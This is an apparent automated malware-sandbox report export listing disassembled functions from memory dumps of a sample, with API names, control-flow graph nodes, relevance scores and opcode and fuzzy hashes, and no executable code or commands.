                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37b2377ea0301960d9e96739a70fb38beb9fa9cbd7ddce187ebb51e4bacbc8d3
                                                    • Instruction ID: 55c774bd0fd642fd8889d68daea149fec22531835d617738c2770a631da05920
                                                    • Opcode Fuzzy Hash: 37b2377ea0301960d9e96739a70fb38beb9fa9cbd7ddce187ebb51e4bacbc8d3
                                                    • Instruction Fuzzy Hash: 05A1CCB1918A8E8FE788DB6CC8557F97FE1EB86310F1041BED04DDB2A2DA795815C780
                                                    Function 00007FFAACCA2C35 Relevance: 1.8, APIs: 1, Instructions: 314COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1363044076.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaacca0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: FullImageNameProcessQuery
                                                    • String ID:
                                                    • API String ID: 3578328331-0
                                                    • Opcode ID: 29fce1e3c3106167b775019adfcbe5934a1708b79b5eb7584458703cdea06ddf
                                                    • Instruction ID: ca60f5a29b49cbfbcd560368092805a9f396a1d9b27ae38bcb75fc2f9b8f6f21
                                                    • Opcode Fuzzy Hash: 29fce1e3c3106167b775019adfcbe5934a1708b79b5eb7584458703cdea06ddf
                                                    • Instruction Fuzzy Hash: A8B13C70918A8D8FEBB8DF18C855BE93BE1FB59301F10812ED84ECB291DB74A545CB81
                                                    Function 00007FFAACCA0724 Relevance: 1.8, APIs: 1, Instructions: 311COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1363044076.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaacca0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: FullImageNameProcessQuery
                                                    • String ID:
                                                    • API String ID: 3578328331-0
                                                    • Opcode ID: b3a0df372fa0d9f730519453bd4c9d88bbb1166c092f40d7144a52f77bd07fbf
                                                    • Instruction ID: 164f49df0a7fa0e20b64807a08a899a8765d34b329b6b15f4035c01fe5817811
                                                    • Opcode Fuzzy Hash: b3a0df372fa0d9f730519453bd4c9d88bbb1166c092f40d7144a52f77bd07fbf
                                                    • Instruction Fuzzy Hash: 98B11B70918A8D8FEBB8DF18C859BE977E1FB59301F10812ED84ECB291DB74A545CB81
                                                    Function 00007FFAAC700040 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 56 7ffaac700040-7ffaac700079 57 7ffaac70007c-7ffaac700152 ResumeThread 56->57 58 7ffaac70007b 56->58 62 7ffaac700154 57->62 63 7ffaac70015a-7ffaac7001a4 57->63 58->57 62->63
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 66a0596e514ce051891c8697b77a0c14d5fd559b6677e31be61d4e98f5c67788
                                                    • Instruction ID: 257a292a9d8b4608c4ab2c46cc1b16b9734154d18ef3bd8b6183f120a99cff4d
                                                    • Opcode Fuzzy Hash: 66a0596e514ce051891c8697b77a0c14d5fd559b6677e31be61d4e98f5c67788
                                                    • Instruction Fuzzy Hash: 7B517A7090978C8FDB95DBA8D895AE9BFB0EF56310F0481AFD049DB292CA249846CB41
                                                    Function 00007FFAAC6FE84D Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 66 7ffaac6fe84d-7ffaac6fe859 67 7ffaac6fe864-7ffaac6fe932 SuspendThread 66->67 68 7ffaac6fe85b-7ffaac6fe863 66->68 72 7ffaac6fe934 67->72 73 7ffaac6fe93a-7ffaac6fe984 67->73 68->67 72->73
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: bb35f19ff75be24411e52b967b614c4f0e3f587e172b5bef43a3d690237a92e3
                                                    • Instruction ID: 41f10c607e6f09ee04a366f5f1e5b6fb83084ff1cf9f86a1aca3cbdbe68b573b
                                                    • Opcode Fuzzy Hash: bb35f19ff75be24411e52b967b614c4f0e3f587e172b5bef43a3d690237a92e3
                                                    • Instruction Fuzzy Hash: 9B414870D0864C8FDB99DFA8D885AEDBBF0FB5A310F10416AD05DE7292DA74A885CB41
                                                    Function 00007FFAAC701E35 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 76 7ffaac701e35-7ffaac701f13 GetFileAttributesW 80 7ffaac701f15 76->80 81 7ffaac701f1b-7ffaac701f59 76->81 80->81
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 6196e5e27fba4a431a7c3e32f321c2dafd3d9dafd15547f1b7bfc484cd5be9d6
                                                    • Instruction ID: 73f29a19669e7f2c8aafa3c51012fac3eacb32fbb4034b151fe5d49128841599
                                                    • Opcode Fuzzy Hash: 6196e5e27fba4a431a7c3e32f321c2dafd3d9dafd15547f1b7bfc484cd5be9d6
                                                    • Instruction Fuzzy Hash: 8B411970E0864C8FDB98DF98D885BEDBBF1FB5A311F10416AD009E7252DA74A845CB41
                                                    Function 00007FFAAC7001A9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 83 7ffaac7001a9-7ffaac7001b5 84 7ffaac7001b7-7ffaac7001bf 83->84 85 7ffaac7001c0-7ffaac700292 CloseHandle 83->85 84->85 89 7ffaac700294 85->89 90 7ffaac70029a-7ffaac7002ee 85->90 89->90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 9af684afcb8249e0a10f6ea91a2beed1b07ad77a5112b146c92ee199406c72f3
                                                    • Instruction ID: e774ebc117d421c8db016cdf6fd42a8cdba9e93e91def69c22c0ed533a7a982d
                                                    • Opcode Fuzzy Hash: 9af684afcb8249e0a10f6ea91a2beed1b07ad77a5112b146c92ee199406c72f3
                                                    • Instruction Fuzzy Hash: D9416C7090864C8FDB99DFA8D888BECBBF0EB5A310F14416AD049E7292DA349885CB41
                                                    Function 00007FFAAC5508E8 Relevance: .2, Instructions: 204COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 174 7ffaac5508e8-7ffaac5508fa 177 7ffaac5508fc 174->177 178 7ffaac5508fd-7ffaac550902 174->178 177->178 179 7ffaac550904 178->179 180 7ffaac550905-7ffaac5689d4 178->180 179->180 182 7ffaac5689db-7ffaac5689e1 180->182 183 7ffaac5689d6 180->183 184 7ffaac568ab5-7ffaac568abb 182->184 183->182 185 7ffaac568ac1-7ffaac568aca 184->185 186 7ffaac5689e6-7ffaac5689f2 184->186 187 7ffaac5689f8-7ffaac568a1c 186->187 188 7ffaac568a22-7ffaac568a8f 187->188 193 7ffaac568a91-7ffaac568a9a 188->193 194 7ffaac568aad-7ffaac568ab2 188->194 193->194 195 7ffaac568a9c-7ffaac568aac 193->195 194->184
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 891946bf44e0644931087a1da58483295a8f0d87b73cbde386dfa77ec7bbd05f
                                                    • Instruction ID: f6511170abe5c234475470be90a309e8ee4aa9718263bb9f2a565ec6599c01fc
                                                    • Opcode Fuzzy Hash: 891946bf44e0644931087a1da58483295a8f0d87b73cbde386dfa77ec7bbd05f
                                                    • Instruction Fuzzy Hash: EE71297190860E9FDB44EF68D494AED7BF0EF59324B05457AE409E7262DB34E885CB80
                                                    Function 00007FFAAC5508D0 Relevance: .2, Instructions: 176COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6cf1d8259278da5fb43d9bac7b4bfd2c36328f2d7cdd47669be52ed0c0c74533
                                                    • Instruction ID: be9ae63b17e88b29183618ac452495cf6cb1e579e8b8b3088f1a0e9791653d7e
                                                    • Opcode Fuzzy Hash: 6cf1d8259278da5fb43d9bac7b4bfd2c36328f2d7cdd47669be52ed0c0c74533
                                                    • Instruction Fuzzy Hash: 8F51707190865E8FDB44EFA8D495AFD7BA0FF49314F14457AD00EE7266DE34A881CB80
                                                    Function 00007FFAAC550960 Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 279 7ffaac550960-7ffaac5689d4 287 7ffaac5689db-7ffaac5689e1 279->287 288 7ffaac5689d6 279->288 289 7ffaac568ab5-7ffaac568abb 287->289 288->287 290 7ffaac568ac1-7ffaac568aca 289->290 291 7ffaac5689e6-7ffaac568a1c 289->291 293 7ffaac568a22-7ffaac568a8f 291->293 298 7ffaac568a91-7ffaac568a9a 293->298 299 7ffaac568aad-7ffaac568ab2 293->299 298->299 300 7ffaac568a9c-7ffaac568aac 298->300 299->289
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa66d1af1e43ee7dee64d95d63aa02659460f5403691dd26d628bd43958cc498
                                                    • Instruction ID: b2ac71fc785ec3b81647958f9adba437e540b8dfccde86f0b631df1d445a796b
                                                    • Opcode Fuzzy Hash: fa66d1af1e43ee7dee64d95d63aa02659460f5403691dd26d628bd43958cc498
                                                    • Instruction Fuzzy Hash: 0B412A71918A1D8FEB84EFA8D495AFD77A1FF58311F10457AE40EE3266CE34A8418B80
                                                    Function 00007FFAAC550998 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 622d815838192d70d12088e125241d7110cfcecfdd68b8318b41c5cb802603e1
                                                    • Instruction ID: f66de53cf66097ff421d1f96f29d41ad6d72b729dd0b599de79f2b6d17a2e169
                                                    • Opcode Fuzzy Hash: 622d815838192d70d12088e125241d7110cfcecfdd68b8318b41c5cb802603e1
                                                    • Instruction Fuzzy Hash: F741E770D1895D8FEB84EF68C495AEDBBF1FB58301F10417AE40EE3255DB34A8458B90
                                                    Function 00007FFAAC553310 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b238429fa16ead2e06a65e795a9519890ca11c4de71449e6c5df692532318f1e
                                                    • Instruction ID: 45dfdb23c2474e7dfa182ab5cd49e0d6b7538e302e0670be26ee0568a8170df0
                                                    • Opcode Fuzzy Hash: b238429fa16ead2e06a65e795a9519890ca11c4de71449e6c5df692532318f1e
                                                    • Instruction Fuzzy Hash: 5141E930959A1ECEEB64DB18C8446F976F5EF5A311F5041B9E00DE2291DF35AA88CF80
                                                    Function 00007FFAAC5580F6 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9c8dbdedaa6db92527bc03e5ad11c962bae5871f5ce85607e79381b20c79610
                                                    • Instruction ID: 101aab672c30c4e3e22cb35fd64c3ff1dd21cca08bb40777c22b152a21078846
                                                    • Opcode Fuzzy Hash: f9c8dbdedaa6db92527bc03e5ad11c962bae5871f5ce85607e79381b20c79610
                                                    • Instruction Fuzzy Hash: E531A871D0852D8FDBA8EF14C855AE9B3F5FB68301F0081EA904EE2654CE75AAC58F81
                                                    Function 00007FFAAC551162 Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea05458457c255277e1d12697dbf80c24e7b193d6b6a2c12de875434c92ebd1c
                                                    • Instruction ID: becf987dcc5e5d013cbe614bc2c6be08ec9d1a32469f1cbe8d4a41a11f3da6f1
                                                    • Opcode Fuzzy Hash: ea05458457c255277e1d12697dbf80c24e7b193d6b6a2c12de875434c92ebd1c
                                                    • Instruction Fuzzy Hash: E221EA7091491ECFEB84EB68C8859ADB7F5FF59300B104569E40ED32A5DF35E944CB80
                                                    Function 00007FFAAC5533D3 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e166d919b1b30f9f84b2f8c3b0637ee46670495a35c88d500aa15a04082e9335
                                                    • Instruction ID: 6282f474824ca32f2e254b6b657a0f4de5883c105bc76b4c2e25a6600d91333d
                                                    • Opcode Fuzzy Hash: e166d919b1b30f9f84b2f8c3b0637ee46670495a35c88d500aa15a04082e9335
                                                    • Instruction Fuzzy Hash: 5D31C570959A2DCEEB64EB18C8587EA77F5EF55342F4041F9E00DE2291DB35AA84CF40
                                                    Function 00007FFAAC550C25 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c99f6547ae887e2150d7560af68cf2a1d6d6a1252973d7294424b1d537b9b58
                                                    • Instruction ID: 57f430925115366c3cde64a7ee0e1096433a37069c60ea87683b8d48afadda9a
                                                    • Opcode Fuzzy Hash: 1c99f6547ae887e2150d7560af68cf2a1d6d6a1252973d7294424b1d537b9b58
                                                    • Instruction Fuzzy Hash: 57212776A4D68E8FF7129B68CC161E9B7A0EFD3321F0484BAD044DB1E2DA396409C7D1
                                                    Function 00007FFAAC550C40 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee5e14bcac938189a9972ac9b19f3273d449d114e5d36b8c3b7246c39cb21b15
                                                    • Instruction ID: dcfab888e56bad6430e592f03be8cdb0eb6909d09903e3a9b00d2cd9627f63c4
                                                    • Opcode Fuzzy Hash: ee5e14bcac938189a9972ac9b19f3273d449d114e5d36b8c3b7246c39cb21b15
                                                    • Instruction Fuzzy Hash: 4A110A76A4E68E8FF7029B68D8111E9B7B4EF93320F0445BAD149DB1E2CA39650C8781
                                                    Function 00007FFAAC5535A9 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a52f0e933017e5ddfcc16815c2ca637a069b68b7cf9b261e1586ab9ce5281ef5
                                                    • Instruction ID: 47289360f8f18a3ee77db899882f4a9b3518d0f97ed6709c286fa70055709fc6
                                                    • Opcode Fuzzy Hash: a52f0e933017e5ddfcc16815c2ca637a069b68b7cf9b261e1586ab9ce5281ef5
                                                    • Instruction Fuzzy Hash: BD21E330859A2ECEEB64EB14CC547EAB2B1FB55342F0041EAD40DE2291DF756A84CF40
                                                    Function 00007FFAAC553629 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction ID: 1fcdb7ab3e202f8ee1d34819ed2687b26ac3709e006a49a43ee30e295f8b285e
                                                    • Opcode Fuzzy Hash: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction Fuzzy Hash: A121C770859A2ECEEB64DB14CC947EA76B4EF45342F0051F9E40DA2291DF75AA84CF40
                                                    Function 00007FFAAC550B87 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22ad0694187c13114cd25a3b61dcc95cf2a88ea34fd62a840a1a196fe7e998e3
                                                    • Instruction ID: 2aa1de628928374a4b578ae104eb75f28180c13ec6425b51ac4cd16f89a7a9a7
                                                    • Opcode Fuzzy Hash: 22ad0694187c13114cd25a3b61dcc95cf2a88ea34fd62a840a1a196fe7e998e3
                                                    • Instruction Fuzzy Hash: D011053166864DCFCB48EF28C881AEAB7E0FF59304F0542AAE84DD7251C730E569CB81
                                                    Function 00007FFAAC550C48 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 709e8041a73b6a9a6bcbcfcb77f6b181b2811a7d095af668ed1624c8da3b6559
                                                    • Instruction ID: 95d4f00e9fdb634fdcd463ba3753411ab28a5415606fb40f1645ff3e5d2b29cf
                                                    • Opcode Fuzzy Hash: 709e8041a73b6a9a6bcbcfcb77f6b181b2811a7d095af668ed1624c8da3b6559
                                                    • Instruction Fuzzy Hash: AA11C87594E69ECFF7029B68C8151E9BBB4EF93310F0485BAD045DB1E2DE39A508C781
                                                    Function 00007FFAAC5506AD Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d2ea1df1432193b36a2be03c53df993327d67ca110971c31aadc17ab06f61f26
                                                    • Instruction ID: 6555ef693022a62851139183297a8f16d8562c8aedbf8afcdd53ffee727870fd
                                                    • Opcode Fuzzy Hash: d2ea1df1432193b36a2be03c53df993327d67ca110971c31aadc17ab06f61f26
                                                    • Instruction Fuzzy Hash: 67F01D7094964E9EEB80EF68D4496EEB7E4FF95315F108476F40CC2190DA35A19487C0
                                                    Function 00007FFAAC551398 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd8da31ec83bceefc293a0740e8c9c68a611d46c911f29a9aa31e7ba06afda84
                                                    • Instruction ID: 4aadce53db19c3a18492342ea390c999cb47bc0ec6c72a7df5593b0d70294740
                                                    • Opcode Fuzzy Hash: fd8da31ec83bceefc293a0740e8c9c68a611d46c911f29a9aa31e7ba06afda84
                                                    • Instruction Fuzzy Hash: A1F0A97091494D9FDF84EF68D448AAA7BF4FF28301F104565F81DC7264DA30E594CB81
                                                    Function 00007FFAAC5506D0 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f33310657b05595e2d8133835693a7d5fba7ddf30e4f8654f710b90df2a55494
                                                    • Instruction ID: 36f1e8bfdf78e744e392b698f9eaa052c476975156e76bb99fa038e2a91af190
                                                    • Opcode Fuzzy Hash: f33310657b05595e2d8133835693a7d5fba7ddf30e4f8654f710b90df2a55494
                                                    • Instruction Fuzzy Hash: B5F01C7085594E9FEB80EF68C8496EEBBE4FF58305F408466F81CD3150DA30A6A4CBC0
                                                    Function 00007FFAAC555A29 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction ID: fcd498cb985e91988df404740046715b4c041d1cc024b028a2fee8a0c8fef947
                                                    • Opcode Fuzzy Hash: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction Fuzzy Hash: 0AF03070D1952FCAFB649B18C8447A976B4FB55304F1084BCD14EA32C0DA385984CF41
                                                    Function 00007FFAAC55AE81 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7c072efc7a6ebf420144e26f7e58e3b666098935ab4f8af04d5bc1ebbcff14c
                                                    • Instruction ID: e00c30cac687be0e16debbdcfc7fd6e5d8a4fdc5825ff90ff0dc564cd2e3c24c
                                                    • Opcode Fuzzy Hash: e7c072efc7a6ebf420144e26f7e58e3b666098935ab4f8af04d5bc1ebbcff14c
                                                    • Instruction Fuzzy Hash: 79F0346090651F8EE7A8DB18C855ABDB7A1EB84240F1081B9D00DA6692DE34AE868F80
                                                    Function 00007FFAAC5536C4 Relevance: .0, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction ID: fc6473c98af36d999e907daabb16c9c31a82b79240295d6249dac8729db430e8
                                                    • Opcode Fuzzy Hash: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction Fuzzy Hash: 2AA01220CDA00BC5F220171440083BC14945B02344F00407CA00D14281CD3950480A41

                                                    Non-executed Functions

                                                    Function 00007FFAAC6F000A Relevance: 15.1, Strings: 10, Instructions: 2588COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8tyr$N[$N[$N[$gAC$gAC$gAC$rZh$rZh$uUW
                                                    • API String ID: 0-2757119641
